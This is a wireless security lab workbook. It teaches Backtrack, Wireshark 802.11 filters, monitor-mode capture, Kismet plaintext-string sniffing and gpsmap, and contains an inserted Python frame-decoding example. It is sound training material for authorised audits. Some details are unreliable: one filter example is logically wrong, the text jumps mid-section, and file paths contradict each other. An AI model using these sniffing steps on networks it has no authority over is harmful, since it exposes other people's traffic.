www.sans.org

SECURITY 617: ASSESSING AND SECURING WIRELESS NETWORKS
Workbook

Copyright © 2007, The SANS Institute. All rights reserved. The entire contents of this publication are the property of the SANS Institute. User may not copy, reproduce, distribute, display, modify or create derivative works based upon all or any portion of this publication in any medium whether printed, electronic or otherwise, without the express written consent of the SANS Institute. Without limiting the foregoing, user may not reproduce, distribute, re-publish, display, modify, or create derivative works based upon all or any portion of this publication for purposes of teaching any computer or electronic security courses to any third party without the express written consent of the SANS Institute.

011307

Lab 1 — Sniffing Wireless

Complete the exercises in this lab to reinforce the material covered in the Sniffing Wireless module. To complete these exercises, you will need the Backtrack Security Tools Linux CD and a supported wireless card, as included in the SWAT toolkit.

Introducing the Backtrack Security Collection Linux Distribution

Purpose: The purpose of this exercise is to introduce the Backtrack Security Collection bootable Linux distribution. This Linux distribution will be used throughout the course for lab exercises.

Description: In this exercise you will configure and boot your laptop from the Backtrack Security Collection CD that is included with your SWAT toolkit. You will learn the basics of navigating the X-Windows interface supplied with the Backtrack CD, and how to prepare your system to complete the lab exercises for this course.

IMPORTANT: It is important to note that hacker tools are not written with the same quality and reliability as commercially-available tools. Many hacker tools work unreliably, and may cause unexpected results against the target system, as well as the local system running the tools.
We have taken steps to ensure the tools used in this lab will not damage your system, and will work as advertised against a target router. However, it is our recommendation that you use a non-critical system that does not hold valuable data that would be disadvantageous to you or your organization if it were lost or otherwise disclosed.

1.1.1. Boot Linux

Boot your laptop using the Backtrack Security Collection Linux distribution (Backtrack) by placing the CD-ROM in your CD-ROM drive and turning your laptop on. Depending on the configuration of your laptop, you may have to instruct the laptop to boot the CD-ROM in favor of the local hard drive during the BIOS startup sequence.

After Backtrack completes the boot sequence (which may take several minutes depending on the speed of your CD-ROM and processor and the size of local memory), you will be presented with a login prompt. Authenticate using the following username and password:

Username: root
Password: toor

After authenticating, you will be presented with a standard shell prompt that will appear similar to the example below:

    BT login: root
    Password: ****
    BT ~ #

At the shell prompt, enter the command "startx" and press Enter. This will start the X-Windows interface for Backtrack. After the X-Windows interface starts, you will be presented with the main GUI window, as shown below.

Figure: KDE Window Manager for Backtrack Security Collection. Note the "K" button in the bottom-left corner.

1.1.2. Exploring Backtrack Tools

The "K" button in the lower-left corner of the taskbar is analogous to a Windows "Start" menu button. Take a few minutes and become familiar with the layout and configuration of these menus. Be sure to identify the locations for the following tools:

  - Kismet
  - Firefox (web browser)

We will continue to use the Backtrack environment throughout the course.
If you experience a problem completing this portion of the lab exercises, please seek the assistance of a proctor or the instructor.

Lab 1-2: Using Wireshark Display Filters

Purpose: This lab will introduce the student to the syntax and language used to manipulate packet captures with the Wireshark display filter language.

Description: In this lab, you will use a supplied packet capture file and control which packets are displayed based on the characteristics of the frames in the file. In the process, you will use various features of the Wireshark display filter language.

1.2.1. Start Wireshark

Start the Wireshark sniffer by clicking "K -> Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button, as shown below.

Figure: KDE run command dialog.

This will start the Wireshark Network Analyzer. After Wireshark starts, maximize the window to fill your screen. Next, open the file "wireshark-sample.dump" in the lab1 folder by clicking File > Open. In the dialog box that is presented, navigate to the /tmp/lab1 folder (double-click the "Filesystem" label, then double-click the "tmp" directory, then double-click the "lab1" directory). Next, select the "wireshark-sample.dump" capture file. Click OK to open the file.

Figure: Wireshark file selection dialog box.

1.2.2. Inspect the packet dissector display

The packet dissector display interprets the contents of the fields of a packet in a tree-like hierarchical view.
The first tree view is always the "Frame" information, which includes the timestamp of the packet (the actual arrival time, the delta time since the previous packet and the time since the first packet). The packet number relative to the number of packets in the current capture is identified, along with the packet length and the capture length information. All of these fields can be used as filter criteria in display filters.

In the first frame of the capture file, expand the "IEEE 802.11" tree. Note that Wireshark collapses other fields in the "IEEE 802.11" tree as well, such as the "Frame Control" field contents. Expanding the "Frame Control" tree may reveal other sub-trees as well.

1.2.3. Inspect the packet contents display

The packet contents display is the bottom-most pane; it displays the hexadecimal and ASCII representation of the packet contents. Click on any of the bytes in the hexadecimal display or the ASCII display to reveal the corresponding field interpretation in the packet dissector display. Note that the inverse is also true: selecting a field in the packet dissector view will highlight the hexadecimal and ASCII bytes of that field in the packet contents display.

1.2.4. Inspect the status bar field display

The status bar is the bar at the bottom-most edge of the Wireshark window. Let's take a look at the information that is displayed in these fields. Click on the destination address field in the packet dissector view. Note that the status bar is updated to show the friendly name of the field ("Destination Hardware Address"), the display filter name for the field ("wlan.da") and the length of the field (6 bytes). The name of the display filter field is important for creating display filters based on the contents of specified fields, as we will see later in this module.

Next to the field information is a second textbox with "P:", "D:" and "M:" listed with various values following them.
The P field indicates the total number of packets in the capture. The D field indicates the total number of packets that are displayed as a result of a display filter, and the M field indicates the number of marked packets.

1.2.5. Filter all packets with the privacy bit set

In the display filter box, supply a filter that will display only packets with the privacy bit set. We can determine the display filter name for the privacy bit by clicking on this field and observing the display name in the status bar, as shown below.

Figure: Identifying the display filter name of the WEP bit field ("wlan.fc.protected", shown in the Frame Control tree as "Protected flag: Data is protected").

Since we want instances where the WEP bit is set, use the WEP filter "wlan.fc.protected eq 1". Click "Apply" to make this filter effective. The applied filter is shown below.

Figure: Applying a filter to exclude all frames without the WEP bit set.

Question: How many packets are displayed after applying the WEP bit set filter?

1.2.6. Inverse WEP filter

There are multiple ways to reverse a filter to display the inverse match. Each of these display filters has the same effect:

    wlan.fc.protected == 0
    !wlan.fc.protected
    wlan.fc.protected != 1

While each filter is subtly different, on a bitwise field with only two possible values (1 or 0) they will always produce the same result. Apply one of the inverse WEP filters shown above and apply the settings.

Question: How many packets are displayed after applying the inverse WEP filter?

1.2.7. Excluding beacon frames

It is often desirable to remove beacon frames from a packet capture, since they represent nearly duplicate information that can otherwise clutter a display of more interesting packets. Identify the display field name of the frame control field by selecting the type/subtype field in the packet dissector pane. Note the value that is represented by Wireshark for this field, as shown below.

Figure: Identifying the display filter name of the frame control type/subtype field ("Type/Subtype: Beacon frame (8)" for a beacon sent from BSSID 00:40:96:47:86:ce).

Apply an inverse filter to eliminate beacon frames from the capture file.

(Hint: Clear the previous filter to display all the packets again)
(Hint: Test for the display field being equal to "8")
(Hint: The display field name is "wlan.fc.type_subtype")
(Hint: Use the negation operator "!" to apply the inverse filter)

Question: How many packets are displayed after removing all the beacon frames from the capture file?

1.2.8. Specifying the BSSID

When evaluating the security of a specific network, it is helpful to reduce the number of packets displayed to only a specific BSSID or collection of BSSIDs.
This allows us to eliminate traffic from ad-hoc networks or access points that are not part of the audit. Apply a filter to display only traffic with the BSSID "00:40:96:47:86:ce".

(Hint: Clear the previous filter to display all the packets again)
(Hint: Click on the BSSID field of any packet)
(Hint: Look at the status bar to determine the display field name)
(Hint: Use the equal-to operator in the display filter)
(Hint: Make sure the BSSID is specified in colon-separated format)

Question: How many packets are displayed for the given BSSID?

1.2.9. Joining filter criteria

So far we've made use of single display filter expressions. Multiple filters can be joined together using the "and" and "or" keywords. Write a display filter to display only traffic from the BSSID "00:40:96:47:86:ce" that is not a beacon frame.

(Hint: Use the previous exercise to retain the BSSID filter)
(Hint: Append the filter language to exclude beacon frames)
(Hint: Separate the filter criteria with the "and" keyword)

Question: How many packets are displayed for the given BSSID that are not beacon frames?

1.2.10. Implementing an inverse filter

Inverse filters allow you to exclude packets that you are not interested in, revealing other useful information. Inverse filters are usually applied by joining multiple filters together. Write a display filter to exclude beacon frames and data frames from the capture list.
(Hint: Clear the previous filter to display all the packets again)
(Hint: Use the frame type/subtype field to identify packet types)
(Hint: Click on the type/subtype field to identify the display name for this field)
(Hint: Click on the sample frames you want to exclude to identify their type/subtype value)
(Hint: The display field name is "wlan.fc.type_subtype")
(Hint: The type for beacon frames is "8")
(Hint: The type for data frames is "32")
(Hint: Combine multiple filters using the "and" keyword)
(Hint: Test the field using the "not equal to" operator)

Question: How many packets are displayed after excluding data and beacon frames?

The display filter for this question could have several correct answers. Assuming you specified the beacon frame type first and the data frame type second, here are some correct answers that are all equally effective:

    wlan.fc.type_subtype != 8 and wlan.fc.type_subtype != 32
    wlan.fc.type_subtype ne 8 and wlan.fc.type_subtype ne 32
    !wlan.fc.type_subtype == 8 and !wlan.fc.type_subtype == 32
    not wlan.fc.type_subtype == 8 and not wlan.fc.type_subtype == 32
    !(wlan.fc.type_subtype == 8 and wlan.fc.type_subtype == 32)

Note the last example: by enclosing the display filter in parentheses, we can apply a single negation operator to the entire expression to reverse its effect.

1.2.11. Searching for a text string

The "contains" keyword allows newer versions of Wireshark to search the contents of display fields for a given string. This comparison operator can be applied to any display field name, and matches when the given string is a substring of the display field contents. Use the "contains" keyword to search the capture file for the keyword "linksys". Use the display field name "frame" to search the entire contents of the packet.

(Hint: Use the syntax "frame contains ...")
(Hint: Specify the search criteria in double-quotes)

Question: How many packets are displayed with the string "linksys"?
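The following Python program is an added example, not part of the workbook: it decodes the 802.11 header fields that the display filters in Lab 1-2 test (wlan.fc.type_subtype, wlan.fc.protected, wlan.bssid and "frame contains") and evaluates each of the lab's filters over a small set of constructed frames, so the "D:" counts can be checked by hand. The frames, the station address and the second access point address are constructed for the example; only 00:40:96:47:86:ce comes from the lab. The combined exclusion is written with "or" inside the negated parentheses, since negating "A and B" would only drop frames that are both a beacon and a data frame at once.

```python
"""Decode 802.11 MAC headers and evaluate the Lab 1-2 display filters over
constructed frames (added example; not the workbook's own code)."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Frame Control byte 1 flag bits (IEEE 802.11 Figure 7-2 layout)
TO_DS, FROM_DS, PROTECTED = 0x01, 0x02, 0x40
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))


@dataclass
class Frame:
    raw: bytes
    ftype: int        # 0 = management, 1 = control, 2 = data
    subtype: int
    flags: int
    addr1: str
    addr2: str
    addr3: str

    @property
    def type_subtype(self) -> int:
        # Wireshark's wlan.fc.type_subtype: beacon -> 8, data -> 32
        return (self.ftype << 4) | self.subtype

    @property
    def protected(self) -> bool:          # wlan.fc.protected
        return bool(self.flags & PROTECTED)

    @property
    def bssid(self) -> Optional[str]:     # wlan.bssid
        if self.ftype == 0:               # management: Address 3 is the BSSID
            return self.addr3
        if self.ftype == 2:               # data: position depends on DS bits
            to_ds, from_ds = bool(self.flags & TO_DS), bool(self.flags & FROM_DS)
            if to_ds and not from_ds:
                return self.addr1         # STA -> AP: receiver is the AP
            if from_ds and not to_ds:
                return self.addr2         # AP -> STA: transmitter is the AP
            if not to_ds and not from_ds:
                return self.addr3         # ad-hoc (IBSS) data
        return None  # simplification: WDS and control frames yield no BSSID


def parse_frame(raw: bytes) -> Frame:
    """Parse a bare 24-byte 802.11 MAC header (no radiotap/Prism header)."""
    if len(raw) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc0, fc1 = raw[0], raw[1]
    if fc0 & 0x03 != 0:
        raise ValueError("unsupported 802.11 protocol version")
    return Frame(raw, (fc0 >> 2) & 0x03, fc0 >> 4, fc1,
                 mac_str(raw[4:10]), mac_str(raw[10:16]), mac_str(raw[16:22]))


def build_frame(ftype: int, subtype: int, flags: int,
                a1: str, a2: str, a3: str, body: bytes = b"") -> bytes:
    """Constructed frame: FC, duration, Address 1-3, sequence control, body."""
    fc0 = (ftype << 2) | (subtype << 4)
    return (bytes([fc0, flags]) + b"\x00\x00" + mac_bytes(a1) + mac_bytes(a2)
            + mac_bytes(a3) + b"\x00\x00" + body)


def beacon_body(ssid: bytes) -> bytes:
    # timestamp(8) + beacon interval(2) + capability(2) + SSID element
    return b"\x00" * 8 + b"\x64\x00" + b"\x11\x00" + bytes([0, len(ssid)]) + ssid


AP = "00:40:96:47:86:ce"        # BSSID used in the lab questions
OTHER_AP = "00:06:25:aa:bb:cc"  # constructed second access point
STA = "00:02:6f:35:73:0f"       # constructed client station

FRAMES: List[Frame] = [parse_frame(raw) for raw in (
    build_frame(0, 8, 0, BROADCAST, AP, AP, beacon_body(b"linksys")),
    build_frame(0, 8, 0, BROADCAST, OTHER_AP, OTHER_AP, beacon_body(b"guest")),
    build_frame(2, 0, TO_DS | PROTECTED, AP, STA, BROADCAST, b"\x00" * 8),
    build_frame(2, 0, FROM_DS, STA, AP, OTHER_AP, b"GET /linksys/ HTTP/1.0"),
    build_frame(2, 0, TO_DS | PROTECTED, OTHER_AP, STA, BROADCAST, b"\x00" * 8),
    build_frame(0, 4, 0, BROADCAST, STA, BROADCAST, b"\x00\x00"),  # probe req
)]

# The lab's display filters, expressed as predicates over a decoded frame
LAB_FILTERS: Dict[str, Callable[[Frame], bool]] = {
    "wlan.fc.protected == 1": lambda f: f.protected,
    "!wlan.fc.protected": lambda f: not f.protected,
    "!wlan.fc.type_subtype == 8": lambda f: f.type_subtype != 8,
    f"wlan.bssid == {AP}": lambda f: f.bssid == AP,
    f"wlan.bssid == {AP} and !wlan.fc.type_subtype == 8":
        lambda f: f.bssid == AP and f.type_subtype != 8,
    "!(wlan.fc.type_subtype == 8 or wlan.fc.type_subtype == 32)":
        lambda f: f.type_subtype not in (8, 32),
    'frame contains "linksys"': lambda f: b"linksys" in f.raw,
}


def displayed(expr: str, frames: List[Frame] = FRAMES) -> int:
    """The 'D:' count the Wireshark status bar would show for this filter."""
    return sum(1 for f in frames if LAB_FILTERS[expr](f))


if __name__ == "__main__":
    for expr in LAB_FILTERS:
        print(f"D: {displayed(expr):2d}   {expr}")
```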
Close Wireshark at the end of this exercise by clicking File > Quit.

Lab 1-3: Capturing Wireless Traffic in Monitor Mode

Purpose: This lab will introduce the process of configuring the wireless interface card in monitor mode.

Description: In this lab, you will use the wireless card supplied in your SWAT toolkit to capture raw 802.11 packets. This is a critical step in the ability to audit wireless networks, since much of our analysis will depend on the ability to capture 802.11 frames from the target network.

1.3.1. Insert your wireless card

For this exercise, we will use the Prism 2.5 wireless card that is supplied with your SWAT toolkit to capture traffic. First, attach the omni-directional snap-on antenna to the wireless card. This provides a mechanism for the radio card to receive traffic on the wireless network. Next, insert the wireless card into your laptop's PCMCIA slot. Depending on your laptop, you should hear two high-pitched beeps. A low-pitched beep indicates a problem with the card insertion event.

Using an XTerm window, use the "ifconfig -a" command to list all the interfaces on your system, as shown below.

    # ifconfig -a
    eth0      Link encap:Ethernet  HWaddr 00:06:1B:C2:DE:EA
              BROADCAST MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
              Interrupt:11

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

    wifi0     Link encap:UNSPEC  HWaddr 00-02-6F-35-73-0F-00-00-00-00-00-00-00-00-00-00
              UP BROADCAST MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
              Interrupt:3 Base address:0x100

    wlan0     Link encap:Ethernet  HWaddr 00:02:6F:35:73:0F
              UP BROADCAST MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
              Interrupt:3 Base address:0x100

Check the output for the presence of the "wlan0" interface, indicating the wireless card is recognized by your system. If you do not see the "wlan0" interface, seek the assistance of a proctor or the instructor.

1.3.2. Configuring Monitor Mode

The "iwconfig" command is used to observe and change the configuration of the wireless card on Linux systems.
Use the "iwconfig wlan0" command to examine the settings present on the wlan0 interface, as shown below:

    # iwconfig wlan0
    wlan0     IEEE 802.11b  ESSID:"test"
              Mode:Managed  Frequency:2.457GHz  Access Point: 44:44:44:44:44:44
              Bit Rate:2Mb/s   Sensitivity=1/3
              Retry min limit:8   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality:0/70  Signal level:-73 dBm  Noise level:-73 dBm
              Rx invalid nwid:0  Rx invalid crypt:255  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:484   Missed beacon:0

Note the default settings for the wlan0 interface are to use the ESSID "test" in mode "Managed". Also note that the default frequency is "2.457 GHz", or channel 10. We'll change this setting to configure the card in monitor mode with the "iwconfig wlan0 mode monitor" command, as shown below:

    # iwconfig wlan0 mode monitor
    # iwconfig wlan0
    wlan0     IEEE 802.11b  ESSID:"test"
              Mode:Monitor  Frequency:2.422GHz  Access Point: 00:00:00:00:00:00
              Bit Rate:2Mb/s   Sensitivity=1/3
              Retry min limit:8   RTS thr:off   Fragment thr:off
              Encryption key:off
              Power Management:off
              Link Quality:0/70  Signal level:-73 dBm  Noise level:-73 dBm
              Rx invalid nwid:0  Rx invalid crypt:255  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:484   Missed beacon:0

Next, ensure the interface is in the "up" state with the ifconfig command, as shown below:

    # ifconfig wlan0
    wlan0     Link encap:UNSPEC  HWaddr 00-02-6F-35-73-0F-10-F8-00-00-00-00-00-00-00-00
              BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:861 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:82647 (80.7 KiB)  TX bytes:0 (0.0 b)
              Interrupt:3 Base address:0x100

    # ifconfig wlan0 up
    # ifconfig wlan0
    wlan0     Link encap:UNSPEC  HWaddr 00-02-6F-35-73-0F-10-F8-00-00-00-00-00-00-00-00
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:1110 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:106635 (104.1 KiB)  TX bytes:0 (0.0 b)
              Interrupt:3 Base address:0x100

Note that the MAC address shown for the wlan0 interface has several trailing values after the actual physical address. This is another indicator we can use to confirm the wireless card has been placed in monitor mode.

Next, open a second XTerm window to start displaying packets captured with the text-based Wireshark tool tshark. Execute the command syntax shown below:

    # tshark -ni wlan0

Depending on the wireless networks in the area, you may or may not get any immediate response from the tshark program on the default channel configuration. Returning to the other XTerm window, use the iwconfig command to change the channel, as shown below:

    # iwconfig wlan0 channel 1
    # iwconfig wlan0 channel 2
    # iwconfig wlan0 channel 3
    # iwconfig wlan0 channel 4
    # iwconfig wlan0 channel 5
    # iwconfig wlan0 channel 6
    # iwconfig wlan0 channel 7
    # iwconfig wlan0 channel 8
    # iwconfig wlan0 channel 9
    # iwconfig wlan0 channel 10
    # iwconfig wlan0 channel 11
    # iwconfig wlan0 channel 1

Depending on the networks in your area, you will start to see wireless traffic information in the output of tshark, as shown below.

Figure: XTerm changing channel numbers with iwconfig while capturing in monitor mode with tshark.

Note that channel hopping is the only way to capture traffic on all wireless networks within range of a single wireless card, and that some traffic is lost in the process while hopping on other channels.

After identifying traffic in monitor mode with tshark, press CTRL+C to stop the capture.

Lab 1-4: Introduction to Kismet

Purpose: This lab will introduce Kismet and the navigation of the Kismet text-based interface.

Description: In this lab exercise we will introduce Kismet as a tool for assessing wireless networks. We'll take a look at how we can run Kismet on the Backtrack Security Tools Linux distribution, navigating the text-based interface to leverage the features of this powerful tool.

1.4.1. Starting Kismet

When capturing GPS information with Kismet, Kismet relies on a helper application known as "gpsd" to read information from the GPS receiver and translate it into a format Kismet can understand. Follow these steps to prepare the GPS and helper application before starting Kismet.

First, connect the SWAT kit USB GPS to your laptop on an available USB port. The red LED should start blinking when connected to a USB port, and will stay solid when the GPS locks onto 3 or more satellites. Since you are likely indoors when you follow this lab, the GPS will be unable to gain a satellite lock. That's OK for the rest of this lab, although you will want to use the GPS outside if you want to collect accurate GPS information from the device.

Next, start the GPS daemon by clicking "K > Run". In the run dialog box, enter the command "gpsd /dev/tts/USB0" to specify the SWAT GPS (use the proper case in this example for the path of the device), as shown below. Click "Run" after specifying the gpsd command.

Figure: Supply the path to the SWAT Kit GPS device as shown in this dialog box.

Now that the GPS helper software is started, we can start the Kismet software. Navigate the KDE menu by clicking "K > Backtrack > Wireless Tools > Analyzer > Kismet". Backtrack will automatically select the first appropriate wireless card and start Kismet, saving the files in the root user's home directory ("/root").

At this point, Kismet will automatically channel hop and identify any networks that are discovered. Depending on the networks that are nearby, the information presented by Kismet will differ, but will look similar to the example below. If Kismet does not start, make sure the wlan0 interface was placed in the "up" state with the command "ifconfig wlan0 up".
Figure: Kismet opening screen, recognizing three networks.

1.4.2. Getting context-sensitive help

The Kismet text-based interface may seem difficult to navigate at first, but it is very straightforward once you learn a few tricks. Even though GUI interfaces exist to work with the kismet_server architecture, the text-based interface offers the most functionality and can be used to quickly navigate between different windows and features with only a few keystrokes.

The abbreviations used on each Kismet screen are explained using context-sensitive help. In any Kismet window, pressing "h" will open a help screen that explains the available options and the abbreviations used on the current screen. Press "h" in the main Kismet window to open the help menu, as shown below.

Figure: Kismet context-sensitive help menu.

Using the up and down arrow keys, navigate the help menu to identify the available options at the main Kismet window.

Question: What does the abbreviation "T" represent in this screen?

Question: What do the abbreviations "A", "P" and "H" represent in this column?

Question: What keystroke is used to exit the help menu?

1.4.3. Changing network sort-order

The default sort order for discovered wireless networks is known as "Autofit mode". Changing the sort order allows the user to navigate between different networks using the up and down arrow keys. Press "s" to select the sort order menu. Note that the order for each sort mechanism can be reversed by using the capitalized form of the sort order keystroke. For example, sorting networks by first seen with "f" can be reversed into descending order with "F".

Figure: Kismet sort option menu.

Sort the networks by choosing the first-time-seen option.

1.4.4. Selecting networks

Once the sort order is changed from autofit mode, use the up and down arrow keys to highlight different networks. Pressing "Enter" or "i" on the selected network will open the "Network Details" screen, as shown below:

Figure: Kismet network details screen.
Select a network that Kismet has identified and view the network details window. Use the up and down arrows to scroll the information that is presented on the screen.

Question: Does Kismet indicate the network uses WEP for the selected network?

Question: What channel is the selected network using?

Question: Is Kismet able to identify the manufacturer for the selected network? What manufacturer does Kismet identify?

1.4.5. Using the traffic analyzer

A useful feature for getting some basic information about the contents of network traffic is the Kismet traffic analyzer in the "dump packet types" menu option. This window briefly summarizes the different packet types observed on the network, and offers some limited upper-layer protocol decode functionality. From the main Kismet window, use the help functionality to identify the option that opens the "dump packet types" menu option. Select this option to open the "Packet Types" window, as shown below.

Figure: Kismet packet decoding window.

Observe the traffic identified in this window. Note that the MAC address of the transmitting station is identified, along with the packet type (MANAGEMENT, DATA) and a brief description of the packet. This view allows you to identify partial traffic contents, although further analysis is best performed with Wireshark or another detailed protocol analysis tool.

1.4.6. Observing plaintext strings

A very useful feature of Kismet is its ability to dump the contents of observed plaintext strings in the "Data String Dump" window. Whenever Kismet sees plaintext ASCII content in the payload of data packets on the network, it will display the ASCII content in this window. From the main Kismet window, use the help functionality to identify the option that opens the "Dump printable strings" menu option. Select this option to open the "Data Strings Dump" window, as shown below.
Figure: Kismet "dump printable strings" feature. This example demonstrates the "CKAAAAAAAAAAAAAAAAAAA" string, which is characteristic of older Windows operating systems vulnerable to NULL session attacks.

Question: What information are you able to obtain about the networks observed in your area from this window?

If there is no unencrypted wireless activity in your area, there will not be any plaintext strings presented. Watch this Kismet window for a few minutes to identify any plaintext strings, then continue with the next step.

1.4.7. Locking the channel

When auditing a specific network, you will likely want to focus on a specific access point on a given channel instead of channel-hopping. Locking Kismet to a specified channel reduces the chances of missing interesting traffic, since it is not spending time on other channels. Kismet recently introduced functionality to dynamically stop and start the channel hopping functionality. We can lock the channel by selecting a given network and pressing the "L" (Lock) key. The Kismet status bar will be updated as shown below.

Figure: Status bar indicating the channel number for the "hostap" source is locked on channel 1.

Note that after locking the channel, the exclamation mark to the left of the network name is consistent for each network on the selected channel. The exclamation mark indicates Kismet is currently seeing traffic for this network; the period indicates Kismet has recently seen traffic for this network. No indicator means that Kismet has not recently seen traffic for the network.

We can revert to the channel hopping process by pressing the "H" (Hopper) key. The Kismet status bar will be updated as shown below.

Figure: Status bar indicating the "hostap" source has reverted to channel hopping.

1.4.8. Quit Kismet

Quit the Kismet tool by pressing "Q" (capital Q). Backtrack will automatically close the XTerm window for Kismet as well.

1.4.9. Identify Kismet Files

Kismet generates several files by default that can be used for post-processing analysis with Wireshark, gpsmap and spreadsheet or database tools. When we started Kismet, we instructed Backtrack to save the files in the "/tmp/lab1" folder; let's take a look at the files that were created.

Return to an XTerm window (or open a new XTerm, if desired). Change to the "/root" folder and list all the files that include the word "Kismet", as shown below.

    # cd /root
    root@1[lab1]# ls Kismet*
    Kismet-Dec-23-2006-1.csv      Kismet-Dec-23-2006-1.network
    Kismet-Dec-23-2006-1.dump     Kismet-Dec-23-2006-1.xml
    Kismet-Dec-23-2006-1.gps
    root@1[lab1]#

Kismet generates several files to log the activity on the wireless network that it recorded. The following table identifies the content of the files based on extension:

    Extension   Contents
    .dump       Libpcap capture file of all wireless traffic observed by Kismet.
    .network    Text-file summary of networks and clients observed by Kismet,
                suitable to be imported into a word processor or viewed with a
                text editor.
    .xml        XML-formatted information collected by Kismet. Suitable to be
                imported into a spreadsheet tool such as Excel.
    .csv        Semicolon-separated data file of Kismet data, also suitable to be
                imported into a spreadsheet tool or a database. Does not provide
                as much information as the XML file.
    .gps        GPS coordinates for traffic collected by Kismet. This file is used
                by the gpsmap tool to generate images of observed networks.
    .cisco      Text-file of Cisco Discovery Protocol (CDP) data observed by
                Kismet. Suitable to be imported into a word processor or viewed
                with a text editor.
    .weak       Libpcap capture of WEP-encrypted packets that include
                cryptographically weak frames, suitable for use with Airsnort.

Note that Kismet will delete files that contain no data when exiting. For instance, if no Cisco Discovery Protocol traffic is observed, Kismet will not produce a ".cisco" file.
If no cryptographically weak WEP packets are observed, Kismet will not produce a ".weak" file.

After assessing a network with Kismet, you can use the output files with other tools such as spreadsheet, word processing and sniffer tools to further massage and analyze the data. With the ".gps" and ".xml" files, you will be able to generate maps that document the range and coverage of signal with the gpsmap tool.

Examine the contents of the Kismet ".network" file with the kedit tool as shown below. Since the name of the ".network" file includes the date stamp, it will likely not match the example below. Please substitute the correct filename for your environment.

    # kedit Kismet-Dec-23-2006-1.network

Kedit will open and display the contents of the ".network" file, presenting summary information about the networks detected by Kismet, similar to the example shown below. Examine the contents of this file and identify information that would be useful to include in a summary report about the characteristics of identified wireless networks. Close kedit by clicking "File > Quit" when finished.

Figure: Kedit display of the Kismet ".network" file.

We'll continue to look at additional methods of leveraging the Kismet output files for post-processing analysis later in this course.

This lab exercise just scratches the surface of the power of Kismet. The best way to gain experience with this powerful tool is to experiment with its features and functionality in different environments. We'll continue to review different Kismet features throughout this course, and introduce a homework exercise that will require students to seek specified access points hidden throughout the conference facility.
Lab 1-5: Introduction to GPSMAP

Purpose: This lab will introduce the student to the use of the gpsmap tool for mapping network coverage from GPS and packet capture data.

Description: In this lab we will use the gpsmap tool to map the networks that were observed by Kismet in a session that is stored on your lab CD-ROM. The steps we use in this lab to produce wireless network coverage diagrams can be repeated with later packet captures for different networks.

1.5.1. Examine gpsmap options

GPSmap is a very powerful tool for documenting the range of wireless networks. There are many options available to generate flexible maps of a variety of formats from a variety of sources. What comes with powerful command-line tools such as gpsmap is a complex user interface. There are so many options to gpsmap that it is often difficult to keep them straight. Fortunately, the manual page and the help that comes with gpsmap clearly define the many options available in gpsmap.

First, change the current directory to the lab1 directory in the /tmp folder created earlier in this exercise, as shown below.

# cd /tmp/lab1

Run the gpsmap program with the "--help" option, redirecting the output to a file. Next, open the file with the gpsmap options to keep as a quick-reference source throughout this lab. Open the file using the "kedit" text editing tool, as shown below.

# gpsmap --help >gpsmap-help.txt
# kedit gpsmap-help.txt &
[1] 7065
#

The kedit tool will display in front of your XTerm window, as shown below.

Figure: kedit displaying the gpsmap help output (gpsmap-help.txt)

...sid.png -u -t -l bssid

Open the "hull-bssid.png" file to view the changes to the map. The updated map should look similar to the following.
Note that the BSSID labeling reveals networks that were not previously characterized by gpsmap with the hull shapes. Kismet requires at least two discrete data points for hull mapping to identify the coverage range.

1.5.5. Create an estimated range map

Estimated range maps are useful to characterize the estimated coverage of a network without requiring a large set of data samples. The estimated range map takes some liberties to estimate the actual useful range of the network based on lost packet characteristics and signal strength information, and can paint a very different picture than the hull map. We'll create an estimated map with the following options; the new options in this step are -r and -R.

Option   Argument (if any)   Description
-D                           Do not delete the source map at completion
-S       2                   Use the TerraServer source for maps
-d       800,600             Generate maps at 800x600 resolution
-o       range-bssid.png     Create the output map as "range-bssid.png"
-r                           Use the "range map" diagram format
-R       50                  Change the opacity of range circles to 50%
-t                           Draw the track traveled in the diagram format
-l       bssid               Label the networks with BSSID information
         gpsmaplab.gps       Kismet GPS file to process

Putting these command-line arguments together, we can execute the gpsmap command as follows. Note that the gpsmap command wraps multiple lines in the example below.

# gpsmap -D -S 2 -d 800,600 -o range-bssid.png -t -r -R 50 -l bssid gpsmaplab.gps
#

Open the "range-bssid.png" file with the display utility to view the changes to the map. The updated map should look similar to the following.

1.5.6. Include center-dot estimate mapping

GPSmap will attempt to estimate the center point of each network based on signal strength levels and averaging from collected data points. We'll create the range map again with the following options; the new option in this step is -e.
Option   Argument (if any)        Description
-D                                Do not delete the source map at completion
-S       2                        Use the TerraServer source for maps
-d       800,600                  Generate maps at 800x600 resolution
